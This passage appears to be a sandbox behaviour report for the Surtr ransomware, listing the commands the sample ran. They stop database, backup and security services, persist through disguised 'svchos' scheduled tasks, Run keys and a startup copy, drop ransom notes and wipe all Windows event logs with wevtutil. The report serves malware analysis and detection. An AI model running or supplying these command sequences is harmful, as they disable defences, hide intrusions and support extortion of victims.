    C:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2008R2"
    3⤵
    PID:1500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2012"
    3⤵
    PID:2968
  - - C:\Windows\system32\net.exe
      net stop "MSSQL$VEEAMSQL2012"
      4⤵
      PID:3388
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2012"
        5⤵
        
        PID:3392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$PROFXENGAGEMENT"
    3⤵
    PID:2528
  - - C:\Windows\system32\net.exe
      net stop "MSSQLFDLauncher$PROFXENGAGEMENT"
      4⤵
      PID:2728
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLFDLauncher$PROFXENGAGEMENT"
        5⤵
        
        PID:2840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher"
    3⤵
    PID:2976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SBSMONITORING"
    3⤵
    PID:992
  - - C:\Windows\system32\net.exe
      net stop "MSSQLFDLauncher$SBSMONITORING"
      4⤵
      PID:2284
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLFDLauncher$SBSMONITORING"
        5⤵
        
        PID:1264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SHAREPOINT"
    3⤵
    PID:2008
  - - C:\Windows\system32\net.exe
      net stop "MSSQLFDLauncher$SHAREPOINT"
      4⤵
      PID:3372
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLFDLauncher$SHAREPOINT"
        5⤵
        
        PID:3400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SQL_2008"
    3⤵
    PID:2488
  - - C:\Windows\system32\net.exe
      net stop "MSSQLFDLauncher$SQL_2008"
      4⤵
      PID:2240
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLFDLauncher$SQL_2008"
        5⤵
        
        PID:1824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$SYSTEM_BGC"
    3⤵
    PID:3416
  - - C:\Windows\system32\net.exe
      net stop "MSSQLFDLauncher$SYSTEM_BGC"
      4⤵
      PID:2848
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLFDLauncher$SYSTEM_BGC"
        5⤵
        
        PID:2640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$TPS"
    3⤵
    PID:2376
  - - C:\Windows\system32\net.exe
      net stop "MSSQLFDLauncher$TPS"
      4⤵
      PID:2140
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLFDLauncher$TPS"
        5⤵
        
        PID:1784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLFDLauncher$TPSAMA"
    3⤵
    PID:1056
  - - C:\Windows\system32\net.exe
      net stop "MSSQLFDLauncher$TPSAMA"
      4⤵
      PID:3432
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLFDLauncher$TPSAMA"
        5⤵
        
        PID:416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLSERVER"
    3⤵
    PID:2468
  - - C:\Windows\system32\net.exe
      net stop "MSSQLSERVER"
      4⤵
      PID:3428
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLSERVER"
        5⤵
        
        PID:788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLServerADHelper100"
    3⤵
    PID:520
  - - C:\Windows\system32\net.exe
      net stop "MSSQLServerADHelper100"
      4⤵
      PID:3384
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLServerADHelper100"
        5⤵
        
        PID:3380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c attrib +R /S "%TEMP%\Service"
    3⤵
    PID:1888
  - - C:\Windows\system32\attrib.exe
      attrib +R /S "C:\Users\Admin\AppData\Local\Temp\Service"
      4⤵
      Views/modifies file attributes
      PID:1524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MSSQLServerOLAPService"
    3⤵
    PID:2224
  - - C:\Windows\system32\net.exe
      net stop "MSSQLServerOLAPService"
      4⤵
      PID:2220
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLServerOLAPService"
        5⤵
        
        PID:1512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MySQL80"
    3⤵
    PID:3444
  - - C:\Windows\system32\net.exe
      net stop "MySQL80"
      4⤵
      PID:1484
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MySQL80"
        5⤵
        
        PID:3412
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F
    3⤵
    PID:3364
  - - C:\Windows\system32\schtasks.exe
      schtasks /CREATE /SC ONLOGON /TN svchos1 /TR "C:\ProgramData\Service\Surtr.exe" /RU SYSTEM /RL HIGHEST /F
      4⤵
      Creates scheduled task(s)
      PID:2704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "MySQL57"
    3⤵
    PID:3460
  - - C:\Windows\system32\net.exe
      net stop "MySQL57"
      4⤵
      PID:3440
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "MySQL57"
        5⤵
        
        PID:1348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "OracleClientCache80"
    3⤵
    PID:2836
  - - C:\Windows\system32\net.exe
      net stop "OracleClientCache80"
      4⤵
      PID:1200
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "OracleClientCache80"
        5⤵
        
        PID:2308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "PDVFSService"
    3⤵
    PID:2216
  - - C:\Windows\system32\net.exe
      net stop "PDVFSService"
      4⤵
      PID:1828
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "PDVFSService"
        5⤵
        
        PID:3456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "POP3Svc"
    3⤵
    PID:968
  - - C:\Windows\system32\net.exe
      net stop "POP3Svc"
      4⤵
      PID:3476
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "POP3Svc"
        5⤵
        
        PID:2112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "ReportServer"
    3⤵
    PID:3328
  - - C:\Windows\system32\net.exe
      net stop "ReportServer"
      4⤵
      PID:3316
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "ReportServer"
        5⤵
        
        PID:1008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "ReportServer$SQL_2008"
    3⤵
    PID:1620
  - - C:\Windows\system32\net.exe
      net stop "ReportServer$SQL_2008"
      4⤵
      PID:3468
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "ReportServer$SQL_2008"
        5⤵
        
        PID:3492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "ReportServer$SYSTEM_BGC"
    3⤵
    PID:3512
  - - C:\Windows\system32\net.exe
      net stop "ReportServer$SYSTEM_BGC"
      4⤵
      PID:3504
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "ReportServer$SYSTEM_BGC"
        5⤵
        
        PID:3488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "ReportServer$TPS"
    3⤵
    PID:1144
  - - C:\Windows\system32\net.exe
      net stop "ReportServer$TPS"
      4⤵
      PID:208
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "ReportServer$TPS"
        5⤵
        
        PID:216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "ReportServer$TPSAMA"
    3⤵
    PID:224
  - - C:\Windows\system32\net.exe
      net stop "ReportServer$TPSAMA"
      4⤵
      PID:232
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "ReportServer$TPSAMA"
        5⤵
        
        PID:3536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "RESvc"
    3⤵
    PID:3528
  - - C:\Windows\system32\net.exe
      net stop "RESvc"
      4⤵
      PID:3520
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "RESvc"
        5⤵
        
        PID:3560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "sacsvr"
    3⤵
    PID:3552
  - - C:\Windows\system32\net.exe
      net stop "sacsvr"
      4⤵
      PID:3544
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "sacsvr"
        5⤵
        
        PID:3588
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SamSs"
    3⤵
    PID:2912
  - - C:\Windows\system32\net.exe
      net stop "SamSs"
      4⤵
      PID:2804
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SamSs"
        5⤵
        
        PID:3584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SAVAdminService"
    3⤵
    PID:3576
  - - C:\Windows\system32\net.exe
      net stop "SAVAdminService"
      4⤵
      PID:3572
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SAVAdminService"
        5⤵
        
        PID:1728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F
    3⤵
    PID:532
  - - C:\Windows\system32\schtasks.exe
      schtasks /CREATE /SC ONLOGON /TN svchos2 /TR "C:\ProgramData\Service\Surtr.exe" /F
      4⤵
      Creates scheduled task(s)
      PID:3620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SAVService"
    3⤵
    PID:3564
  - - C:\Windows\system32\net.exe
      net stop "SAVService"
      4⤵
      PID:3608
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SAVService"
        5⤵
        
        PID:3652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Smcinst"
    3⤵
    PID:3644
  - - C:\Windows\system32\net.exe
      net stop "Smcinst"
      4⤵
      PID:3636
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Smcinst"
        5⤵
        
        PID:3676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SmcService"
    3⤵
    PID:3668
  - - C:\Windows\system32\net.exe
      net stop "SmcService"
      4⤵
      PID:3660
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SmcService"
        5⤵
        
        PID:3708
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SMTPSvc"
    3⤵
    PID:3700
  - - C:\Windows\system32\net.exe
      net stop "SMTPSvc"
      4⤵
      PID:3692
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SMTPSvc"
        5⤵
        
        PID:3684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SNAC"
    3⤵
    PID:3628
  - - C:\Windows\system32\net.exe
      net stop "SNAC"
      4⤵
      PID:3604
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SNAC"
        5⤵
        
        PID:3740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SntpService"
    3⤵
    PID:3724
  - - C:\Windows\system32\net.exe
      net stop "SntpService"
      4⤵
      PID:3716
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SntpService"
        5⤵
        
        PID:3748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "C:\ProgramData\Service\Surtr.exe" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe"
    3⤵
    - Drops startup file
    PID:3764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "sophossps"
    3⤵
    PID:3732
  - - C:\Windows\system32\net.exe
      net stop "sophossps"
      4⤵
      PID:3784
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "sophossps"
        5⤵
        
        PID:3768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    PID:3776
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos1" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
      4⤵
      Adds Run key to start application
      PID:3752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$BKUPEXEC"
    3⤵
    PID:3820
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$BKUPEXEC"
      4⤵
      PID:3812
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$BKUPEXEC"
        5⤵
        
        PID:3804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    PID:3796
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "svchos2" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
      4⤵
      Adds Run key to start application
      PID:3788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    PID:3844
  - - C:\Windows\system32\reg.exe
      reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos3" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
      4⤵
      Adds Run key to start application
      PID:3828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$ECWDB2"
    3⤵
    PID:3836
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$ECWDB2"
      4⤵
      PID:3868
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$ECWDB2"
        5⤵
        
        PID:3852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
    3⤵
    PID:3904
  - - C:\Windows\system32\reg.exe
      reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "svchos4" /t REG_SZ /d C:\ProgramData\Service\Surtr.exe /f
      4⤵
      Adds Run key to start application
      PID:3888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$PRACTTICEBGC"
    3⤵
    PID:3896
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$PRACTTICEBGC"
      4⤵
      PID:3948
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$PRACTTICEBGC"
        5⤵
        
        PID:3932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "%TEMP%\Service\Private_DATA.surt" "%USERPROFILE%\Desktop\Private_DATA.surt"
    3⤵
    PID:3936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "%TEMP%\Service\ID_DATA.surt" "%USERPROFILE%\Desktop\ID_DATA.surt"
    3⤵
    PID:3924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "%TEMP%\Service\SURTR_README.hta" "%USERPROFILE%\Desktop\SURTR_README.hta"
    3⤵
    PID:3968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$PRACTTICEMGT"
    3⤵
    PID:3952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c copy "%TEMP%\Service\Service\SURTR_README.txt" "%USERPROFILE%\Desktop\SURTR_README.txt"
    3⤵
    PID:3980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "SQLAgent$PROFXENGAGEMENT"
    3⤵
    PID:3964
  - - C:\Windows\system32\net.exe
      net stop "SQLAgent$PROFXENGAGEMENT"
      4⤵
      PID:4036
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$PROFXENGAGEMENT"
        5⤵
        
        PID:4044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c for /F "tokens=*" %s in ('wevtutil.exe el') DO wevtutil.exe cl "%s"
    3⤵
    PID:4012
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wevtutil.exe el
      4⤵
      PID:4028
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe el
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4092
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Analytic"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2360
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Application"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2816
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "DebugChannel"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3220
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "DirectShowFilterGraph"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2364
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "DirectShowPluginControl"
      4⤵
      Clears Windows event logs
      Suspicious use of AdjustPrivilegeToken
      PID:1608
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Els_Hyphenation/Analytic"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2264
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "EndpointMapper"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2392
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "ForwardedEvents"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2416
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "HardwareEvents"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3376
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Internet Explorer"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3424
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Key Management Service"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:612
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "MF_MediaFoundationDeviceProxy"
      4⤵
      Clears Windows event logs
      Suspicious use of AdjustPrivilegeToken
      PID:1860
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Media Center"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1280
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "MediaFoundationDeviceProxy"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2280
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "MediaFoundationPerformance"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1640
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "MediaFoundationPipeline"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1684
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "MediaFoundationPlatform"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3324
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-IE/Diagnostic"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3508
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-IEDVTOOL/Diagnostic"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3532
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3516
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3548
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3364
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3576
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-ADSI/Debug"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3564
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-API-Tracing/Operational"
      4⤵
      Clears Windows event logs
      Suspicious use of AdjustPrivilegeToken
      PID:3644
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-ATAPort/General"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3628
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3720
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"
      4⤵
      Clears Windows event logs
      Suspicious use of AdjustPrivilegeToken
      PID:3824
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-AltTab/Diagnostic"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3800
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-AppID/Operational"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3840
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"
      4⤵
      PID:3900
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"
      4⤵
      PID:3980
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"
      4⤵
      PID:2780
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"
      4⤵
      PID:3132
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"
      4⤵
      PID:2880
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"
      4⤵
      PID:2748
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Application-Experience/Problem-Steps-Recorder"
      4⤵
      Clears Windows event logs
      PID:4092
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"
      4⤵
      PID:2152
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"
      4⤵
      PID:2732
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"
      4⤵
      PID:2824
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory/Debug"
      4⤵
      PID:2356
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"
      4⤵
      Clears Windows event logs
      PID:2132
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"
      4⤵
      PID:588
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Audio/Operational"
      4⤵
      PID:760
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Audio/Performance"
      4⤵
      PID:816
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Audit/Analytic"
      4⤵
      PID:2720
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"
      4⤵
      PID:1152
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"
      4⤵
      PID:1436
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Backup"
      4⤵
      Clears Windows event logs
      PID:1676
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"
      4⤵
      PID:1900
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"
      4⤵
      PID:1664
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"
      4⤵
      PID:736
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"
      4⤵
      PID:3192
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"
      4⤵
      PID:3184
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"
      4⤵
      PID:2032
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"
      4⤵
      PID:3208
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"
      4⤵
      Clears Windows event logs
      PID:3200
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"
      4⤵
      PID:988
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"
      4⤵
      PID:3256
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"
      4⤵
      Clears Windows event logs
      PID:2040
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"
      4⤵
      PID:1116
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-CDROM/Operational"
      4⤵
      PID:1012
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-COM/Analytic"
      4⤵
      PID:1448
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"
      4⤵
      PID:3216
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Calculator/Debug"
      4⤵
      PID:3232
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-Calculator/Diagnostic"
      4⤵
      PID:3280
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"
      4⤵
      PID:2700
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"
      4⤵
      PID:2816
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"
      4⤵
      PID:3268
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"
      4⤵
      Clears Windows event logs
      PID:2056
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"
      4⤵
      PID:2588
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"
      4⤵
      PID:2352
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"
      4⤵
      PID:2384
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"
      4⤵
      PID:2136
  - - C:\Windows\system32\wevtutil.exe
